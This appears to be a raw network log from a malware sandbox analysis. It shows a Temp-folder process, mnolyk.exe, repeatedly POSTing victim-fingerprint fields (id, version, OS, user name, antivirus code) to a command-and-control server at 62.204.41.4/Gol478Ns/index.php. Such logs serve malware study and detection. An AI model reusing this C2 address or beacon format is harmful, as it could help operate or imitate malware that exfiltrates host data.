Feb 7, 2023 20:03:32.801080942 CET	723	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:32.864428043 CET	723	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
569	192.168.2.6	50294	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:33.100244999 CET	724	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:33.166033983 CET	724	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.6	49777	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:04.763084888 CET	171	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:04.827470064 CET	177	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
570	192.168.2.6	50295	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:33.354557991 CET	725	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:33.419173002 CET	725	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
571	192.168.2.6	50296	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:33.595122099 CET	726	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:33.658972025 CET	726	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
572	192.168.2.6	50297	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:33.829767942 CET	727	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:33.894370079 CET	727	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
573	192.168.2.6	50298	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:34.067173958 CET	728	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:34.133635044 CET	728	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
574	192.168.2.6	50299	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:34.321474075 CET	729	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:34.386110067 CET	729	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
575	192.168.2.6	50300	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:34.563838005 CET	730	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:34.627953053 CET	730	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
576	192.168.2.6	50301	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:34.801016092 CET	731	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:34.866466045 CET	731	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
577	192.168.2.6	50302	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:35.050149918 CET	732	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:35.117278099 CET	732	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
578	192.168.2.6	50303	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:35.307802916 CET	733	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:35.371079922 CET	733	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
579	192.168.2.6	50304	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:35.546382904 CET	734	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:35.610938072 CET	734	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.6	49778	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:04.997292995 CET	178	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:05.060085058 CET	178	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
580	192.168.2.6	50305	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:35.785500050 CET	735	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:35.849256039 CET	735	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
581	192.168.2.6	50306	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:36.017601967 CET	736	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:36.084789991 CET	736	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
582	192.168.2.6	50307	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:36.268284082 CET	737	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:36.332087040 CET	737	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
583	192.168.2.6	50308	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:36.533930063 CET	738	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:36.598963976 CET	738	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
584	192.168.2.6	50309	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:36.772736073 CET	739	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:36.837404966 CET	739	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
585	192.168.2.6	50310	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:37.027404070 CET	740	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:37.092389107 CET	740	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
586	192.168.2.6	50311	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:37.282021999 CET	741	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:37.346067905 CET	741	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
587	192.168.2.6	50312	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:37.521186113 CET	742	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
